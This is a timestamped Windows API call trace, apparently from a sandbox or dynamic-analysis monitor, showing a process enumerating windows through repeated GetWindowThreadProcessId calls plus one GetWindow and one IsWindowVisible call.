	[0464.815] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x12c0
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x12e4
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1270
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1298
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x120c
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x122c
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x11c4
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x11b0
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1188
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1148
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1160
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x10fc
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe34
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xea4
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x514
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe48
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xbc8
	[0464.816] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xdf8
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x318
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xcac
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x8bc
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf9c
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf48
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe40
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xecc
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xeb8
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe80
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe98
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe60
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xee4
	[0464.817] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf00
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xdf0
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe1c
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xdd0
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xd94
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xd74
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xd00
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xcd8
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc84
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xca4
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc64
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc24
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb84
	[0464.818] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xbac
	[0464.819] GetWindow (hWnd=0x10316, uCmd=0x4) returned 0x0
	[0464.820] IsWindowVisible (hWnd=0x10316) returned 0
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x384
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xab8
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x33c
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa44
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa64
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x8a8
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xaf0
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x88c
	[0464.820] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb04
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x910
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x230
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xac0
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xab4
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xaac
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x3d0
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x978
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa7c
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x59c
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa88
	[0464.821] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa6c
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa68
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x9f8
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa04
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x924
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x8dc
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x7dc
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x768
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x764
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x820
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x810
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x794
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x83c
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x7ac
	[0464.822] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb44
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb5c
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x838
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x818
	[0464.823] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x5b8
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x494
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1ec
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x440
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x7e8
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x730
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x2c8
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x31c
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x330
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x128
	[0464.824] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x5c8
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x6f8
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x358
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x73c
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb0
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x250
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x240
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x790
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x61c
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x540
	[0464.825] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x538
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x568
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x538
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x568
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x538
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x540
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x540
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x57c
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x460
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x554
	[0464.826] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x528
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x79c
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4e0
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x460
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x460
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x44c
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x778
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x460
	[0464.827] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x558
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1198
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1080
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1074
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x106c
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1474
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1414
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xbd0
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x550
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa38
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x16d0
	[0464.828] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x16d4
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x15bc
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x15a0
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x159c
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1598
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1594
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1590
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x158c
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1588
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1584
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1580
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x157c
	[0464.829] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1488
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1404
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x11b8
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xbd4
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe0c
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xd30
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe70
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x13b8
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe20
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe2c
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe00
	[0464.830] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe04
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc94
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x13b0
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x13ac
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x13a8
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1374
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x132c
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1328
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x12d0
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x12cc
	[0464.831] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x12c8
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1290
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1218
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1214
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x11ec
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x11e8
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x11cc
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1140
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe6c
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x6e8
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc6c
	[0464.832] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf94
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xffc
